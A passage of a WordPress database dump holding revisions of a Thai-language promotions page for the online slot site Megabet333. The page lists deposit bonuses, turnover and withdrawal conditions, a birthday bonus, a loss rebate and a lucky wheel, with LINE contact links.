src=\"https://amb18b.com/wp-content/uploads/2025/10/Free_bonus_100_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Free_bonus_100_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Free_bonus_100_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Free_bonus_100_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Free_bonus_100_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปรรับโมบัส 100%</h2> <p style=\"text-align: center;\" data-start=\"696\" data-end=\"740\"><strong data-start=\"696\" data-end=\"711\">คุ้มสองเด้ง</strong> เติมเท่าไรรับเพิ่มเท่านั้น</p><ul><li data-start=\"696\" data-end=\"740\"><strong data-start=\"743\" data-end=\"758\">100 รับ 200</strong></li><li data-start=\"696\" data-end=\"740\"><strong data-start=\"763\" data-end=\"780\">500 รับ 1,000</strong></li></ul><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"798\" data-end=\"813\">ทำ 6 เทิร์น</strong>, <strong data-start=\"815\" data-end=\"835\">ถอนสูงสุด 3 เท่า</strong></li><li data-start=\"798\" data-end=\"837\">ก่อนถอน <strong data-start=\"848\" data-end=\"886\">ระบบตัดเครดิตโปรโมชั่น (ส่วนโบนัส)</strong> ออกโดยอัตโนมัติ เหลือยอดเงินจริงสำหรับถอน</li><li data-start=\"798\" data-end=\"837\">จำกัดสิทธิ์ <strong data-start=\"945\" data-end=\"967\">1 ครั้ง/วัน/ผู้ใช้</strong></li></ul> <a href=\"https://line.me/R/ti/p/@036terdw\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/HBD_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/HBD_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/HBD_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/HBD_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/HBD_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>Happy Birthday Bonus </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">🎁 ฉลองเดือนเกิด รับของขวัญตามยอดฝากสะสมภายในเดือนนั้น <br />(รับได้ตลอดทั้งเดือนเกิด)</p><ul><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1480\" data-end=\"1496\">3,000 ขึ้นไป</strong> → <strong data-start=\"1499\" data-end=\"1513\">รับฟรี 300</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1529\" data-end=\"1542\">500–2,999</strong> → <strong data-start=\"1545\" data-end=\"1555\">รับ 50</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1571\" data-end=\"1586\">ไม่เกิน 500</strong> → <strong data-start=\"1589\" data-end=\"1616\">ฝากเท่าไร รับเพิ่ม 100%</strong></li></ul><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"1634\" data-end=\"1680\"><strong data-start=\"1634\" data-end=\"1653\">ทำเทิร์น 5 เท่า</strong>, <strong data-start=\"1655\" data-end=\"1678\">ถอนได้สูงสุด 3 เท่า</strong></li><li data-start=\"1634\" data-end=\"1680\">ยืนยันสิทธิ์โดย <strong data-start=\"1699\" data-end=\"1727\">แจ้งบัตรประชาชนกับแอดมิน</strong></li></ul> <a href=\"https://line.me/R/ti/p/@036terdw\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Reward_10_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Reward_10_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Reward_10_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Reward_10_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Reward_10_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>คืนยอดเสีย 10%</h2> <p style=\"text-align: center;\" data-start=\"1088\" data-end=\"1118\">เสียไม่เสียเปล่า! ระบบ <strong data-start=\"1844\" data-end=\"1878\">แปลงยอดเสียเป็นแต้ม Reward 10%</strong> <br />นำแต้มไปลุ้นใหมหรือจะแลกของรางวัลก็ได้ ในหน้าแลกแต้ม</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"1936\" data-end=\"1990\">คิดเป็นเปอร์เซ็นต์จากยอดเสียสุทธิ ตามรอบที่ระบบกำหนด</li><li data-start=\"1936\" data-end=\"1990\">แต้มไม่ใช่เงินสดโดยตรง ต้องนำไปแลกตามรายการที่เปิดให้แลกในขณะนั้น</li></ul> <a href=\"https://line.me/R/ti/p/@036terdw\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Lucky_wheel_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Lucky_wheel_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Lucky_wheel_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Lucky_wheel_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Lucky_wheel_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>Lucky Wheel กงล้อเสี่ยงโชค </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">หมุนลุ้นรางวัลทุกวันด้วยแต้ม <strong data-start=\"75\" data-end=\"85\">Reward</strong> ของคุณ <br />เปลี่ยนแต้มเป็นสิทธิ์หมุน แล้วรับเครดิตโบนัสทันทีหลังจบการหมุน</p><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"197\" data-end=\"252\"><strong data-start=\"197\" data-end=\"250\">20 / 50 / 100 / 150 / 200 / 250 / 300 เครดิตโบนัส</strong></li><li data-start=\"197\" data-end=\"252\"><strong data-start=\"255\" data-end=\"275\">🎁 Mystery Prize</strong> สุ่มรางวัลพิเศษ (เช่น 500 เครดิต <strong data-start=\"310\" data-end=\"318\">หรือ</strong> สปินเพิ่ม +1)</li></ul> <a href=\"https://line.me/R/ti/p/@036terdw\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>วิธีการรับโปรโมชั่น</h2> <ul><li data-start=\"2531\" data-end=\"2570\">เข้าสู่ระบบ → ไปที่เมนู <strong data-start=\"2555\" data-end=\"2568\">โปรโมชั่น</strong></li><li data-start=\"2574\" data-end=\"2643\">เลือกโปรที่ต้องการ และกด <strong data-start=\"2599\" data-end=\"2614\">กดรับสิทธิ์</strong> (หรือแจ้งแอดมินตามที่ระบุ)</li><li data-start=\"2647\" data-end=\"2706\">ระบบเครดิตเข้า <strong data-start=\"2662\" data-end=\"2675\">อัตโนมัติ</strong> / หรือหลังยืนยันสิทธิ์สำเร็จ</li><li data-start=\"2710\" data-end=\"2741\">ตรวจสอบสถานะได้ในประวัติธุรกรรม</li></ul> <h2>เงื่อนไข</h2> <ul><li data-start=\"2092\" data-end=\"2176\">โปรทั้งหมดสำหรับ <strong data-start=\"2109\" data-end=\"2138\">1 ผู้ใช้/1 อุปกรณ์/1 ไอพี</strong> ห้ามใช้หลายบัญชีหรือทุจริตทุกรูปแบบ</li><li data-start=\"2179\" data-end=\"2301\">การนับเทิร์นและการถอน <strong data-start=\"2201\" data-end=\"2237\">เป็นไปตามระบบอัตโนมัติของ naijan</strong> เฉพาะหมวดสล็อต (หากมีหมวดที่ไม่นับเทิร์น ระบบจะแจ้งในหน้าเกม)</li><li data-start=\"2304\" data-end=\"2404\">เมื่อกดรับโปรใดโปรหนึ่ง ถือว่ายอมรับเงื่อนไขของโปรนั้น ๆ และ <strong data-start=\"2365\" data-end=\"2385\">ไม่สามารถซ้อนโปร</strong> ยกเว้นที่ระบุไว้</li><li data-start=\"2407\" data-end=\"2499\">naijan <strong data-start=\"2414\" data-end=\"2445\">ขอสงวนสิทธิ์ปรับปรุง/ยกเลิก</strong> โปรโมชั่น และปฏิเสธการจ่ายหากตรวจพบทุจริต/ผิดเงื่อนไข</li></ul>','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2025-10-25 06:10:17','2025-10-25 06:10:17','',27,'https://megabet333.biz/?p=165',0,'revision','',0),(166,3,'2025-10-25 06:10:19','2025-10-25 06:10:19','<h1>โปรโมชั่น Megabet333 รวมโปรสล็อต โบนัสฟรี 100% ถอนไม่อั้น</h1> <p data-start=\"346\" data-end=\"760\">ถ้าพูดถึงสิ่งที่ดึงดูดผู้เล่นให้เข้ามาเล่นสล็อตออนไลน์ megabet มากที่สุดก็คงหนีไม่พ้น “<strong>โปรโมชั่นสล็อต</strong>” เพราะเป็นตัวช่วยสำคัญที่ทำให้ผู้เล่นได้ทั้งความคุ้มค่าและความสนุกไปพร้อมกัน เว็บพนันออนไลน์ยุคใหม่จึงแข่งขันกันออกโปรโมชั่นเด็ด ๆ เพื่อเอาใจนักเดิมพันทุกกลุ่ม ไม่ว่าจะเป็นมือใหม่หรือผู้เล่นประจำ ต่างก็สามารถรับสิทธิ์พิเศษได้เต็มที่ ยิ่งถ้าเลือกเว็บที่มีโปรหลากหลายและแจกจริง ยิ่งช่วยให้การเล่นสล็อตสนุกมากขึ้นกว่าที่เคย เว็บพนันออนไลน์ในปัจจุบันไม่เพียงแต่ให้บริการเกมสล็อตจากค่ายชั้นนำเท่านั้น แต่ยังมาพร้อมโปรโมชั่นสล็อตที่ครอบคลุมทุกช่วงเวลา ตั้งแต่สมัครสมาชิก ฝากเงิน ถอนเงิน ไปจนถึงโปรคืนยอดเสีย ซึ่งทั้งหมดนี้ถือเป็นโอกาสทองสำหรับผู้เล่นที่อยากเพิ่มทุนแบบไม่ต้องลงทุนเยอะ แถมยังช่วยให้ปั่นสล็อตได้ต่อเนื่องแบบไม่มีสะดุด</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/20_get_100_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/20_get_100_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/20_get_100_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/20_get_100_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/20_get_100_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปร 20 รับ 100</h2> <p style=\"text-align: center;\">ฝาก 20 → รับเพิ่ม 80 = รวม 100 / ทำเทิร์น 8 เท่า / ถอนได้สูงสุด 200</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 8 เท่า ของยอดรวม</li><li>เฉพาะสล็อตเท่านั้น</li><li>ห้ามซื้อฟรีสปิน</li></ul> <a href=\"https://line.me/R/ti/p/@036terdw\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/79_get_200_7turn_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/79_get_200_7turn_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/79_get_200_7turn_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/79_get_200_7turn_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/79_get_200_7turn_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปร 79 รับ 200</h2> <p style=\"text-align: center;\">ฝาก 79 → รับเพิ่ม 121 = รวม 200 / ทำเทิร์น 7 เท่า / ถอนได้สูงสุด 600</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 7 เท่า ของยอดรวม</li><li data-start=\"798\" data-end=\"837\">เฉพาะสล็อตเท่านั้น</li><li data-start=\"798\" data-end=\"837\">ห้ามซื้อฟรีสปิน</li></ul> <a href=\"https://line.me/R/ti/p/@036terdw\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Free_bonus_100_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Free_bonus_100_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Free_bonus_100_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Free_bonus_100_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Free_bonus_100_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปรรับโมบัส 100%</h2> <p style=\"text-align: center;\" data-start=\"696\" data-end=\"740\"><strong data-start=\"696\" data-end=\"711\">คุ้มสองเด้ง</strong> เติมเท่าไรรับเพิ่มเท่านั้น</p><ul><li data-start=\"696\" data-end=\"740\"><strong data-start=\"743\" data-end=\"758\">100 รับ 200</strong></li><li data-start=\"696\" data-end=\"740\"><strong data-start=\"763\" data-end=\"780\">500 รับ 1,000</strong></li></ul><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"798\" data-end=\"813\">ทำ 6 เทิร์น</strong>, <strong data-start=\"815\" data-end=\"835\">ถอนสูงสุด 3 เท่า</strong></li><li data-start=\"798\" data-end=\"837\">ก่อนถอน <strong data-start=\"848\" data-end=\"886\">ระบบตัดเครดิตโปรโมชั่น (ส่วนโบนัส)</strong> ออกโดยอัตโนมัติ เหลือยอดเงินจริงสำหรับถอน</li><li data-start=\"798\" data-end=\"837\">จำกัดสิทธิ์ <strong data-start=\"945\" data-end=\"967\">1 ครั้ง/วัน/ผู้ใช้</strong></li></ul> <a href=\"https://line.me/R/ti/p/@036terdw\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/HBD_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/HBD_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/HBD_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/HBD_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/HBD_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>Happy Birthday Bonus </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">🎁 ฉลองเดือนเกิด รับของขวัญตามยอดฝากสะสมภายในเดือนนั้น <br />(รับได้ตลอดทั้งเดือนเกิด)</p><ul><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1480\" data-end=\"1496\">3,000 ขึ้นไป</strong> → <strong data-start=\"1499\" data-end=\"1513\">รับฟรี 300</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1529\" data-end=\"1542\">500–2,999</strong> → <strong data-start=\"1545\" data-end=\"1555\">รับ 50</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1571\" data-end=\"1586\">ไม่เกิน 500</strong> → <strong data-start=\"1589\" data-end=\"1616\">ฝากเท่าไร รับเพิ่ม 100%</strong></li></ul><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"1634\" data-end=\"1680\"><strong data-start=\"1634\" data-end=\"1653\">ทำเทิร์น 5 เท่า</strong>, <strong data-start=\"1655\" data-end=\"1678\">ถอนได้สูงสุด 3 เท่า</strong></li><li data-start=\"1634\" data-end=\"1680\">ยืนยันสิทธิ์โดย <strong data-start=\"1699\" data-end=\"1727\">แจ้งบัตรประชาชนกับแอดมิน</strong></li></ul> <a href=\"https://line.me/R/ti/p/@036terdw\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Reward_10_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Reward_10_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Reward_10_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Reward_10_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Reward_10_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>คืนยอดเสีย 10%</h2> <p style=\"text-align: center;\" data-start=\"1088\" data-end=\"1118\">เสียไม่เสียเปล่า! ระบบ <strong data-start=\"1844\" data-end=\"1878\">แปลงยอดเสียเป็นแต้ม Reward 10%</strong> <br />นำแต้มไปลุ้นใหมหรือจะแลกของรางวัลก็ได้ ในหน้าแลกแต้ม</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"1936\" data-end=\"1990\">คิดเป็นเปอร์เซ็นต์จากยอดเสียสุทธิ ตามรอบที่ระบบกำหนด</li><li data-start=\"1936\" data-end=\"1990\">แต้มไม่ใช่เงินสดโดยตรง ต้องนำไปแลกตามรายการที่เปิดให้แลกในขณะนั้น</li></ul> <a href=\"https://line.me/R/ti/p/@036terdw\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Lucky_wheel_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Lucky_wheel_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Lucky_wheel_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Lucky_wheel_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Lucky_wheel_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>Lucky Wheel กงล้อเสี่ยงโชค </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">หมุนลุ้นรางวัลทุกวันด้วยแต้ม <strong data-start=\"75\" data-end=\"85\">Reward</strong> ของคุณ <br />เปลี่ยนแต้มเป็นสิทธิ์หมุน แล้วรับเครดิตโบนัสทันทีหลังจบการหมุน</p><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"197\" data-end=\"252\"><strong data-start=\"197\" data-end=\"250\">20 / 50 / 100 / 150 / 200 / 250 / 300 เครดิตโบนัส</strong></li><li data-start=\"197\" data-end=\"252\"><strong data-start=\"255\" data-end=\"275\">🎁 Mystery Prize</strong> สุ่มรางวัลพิเศษ (เช่น 500 เครดิต <strong data-start=\"310\" data-end=\"318\">หรือ</strong> สปินเพิ่ม +1)</li></ul> <a href=\"https://line.me/R/ti/p/@036terdw\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>วิธีการรับโปรโมชั่น</h2> <ul><li data-start=\"2531\" data-end=\"2570\">เข้าสู่ระบบ → ไปที่เมนู <strong data-start=\"2555\" data-end=\"2568\">โปรโมชั่น</strong></li><li data-start=\"2574\" data-end=\"2643\">เลือกโปรที่ต้องการ และกด <strong data-start=\"2599\" data-end=\"2614\">กดรับสิทธิ์</strong> 